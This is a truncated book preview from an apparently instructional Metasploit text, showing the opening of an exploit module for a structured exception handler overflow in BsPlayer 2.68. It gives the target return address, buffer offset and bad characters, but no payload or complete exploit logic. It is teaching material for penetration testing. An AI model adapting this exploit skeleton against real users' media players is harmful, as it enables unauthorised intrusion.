June 2019
Beginner to intermediate
660 pages
14h 30m
English
Let's start the coding part of our exploit in Metasploit:
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info={})
super(update_info(info,
'Name' => "BsPlayer 2.68 SEH Overflow Exploit",
'Description' => %q{
Here's an example of Server Based Exploit
},
'Author' => [ 'Nipun Jaswal' ],
'Platform' => 'win',
'Targets' =>
[
[ 'Generic', {'Ret' => 0x0000583b, 'Offset' => 2048} ],
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x20\x0d"
},
'DisclosureDate' => "May 19 2016",
'DefaultTarget' => 0))
end
Having worked with so many exploits, we can see that the preceding code section is no different, with the exception of the TCP server library file ...
Read now
Unlock full access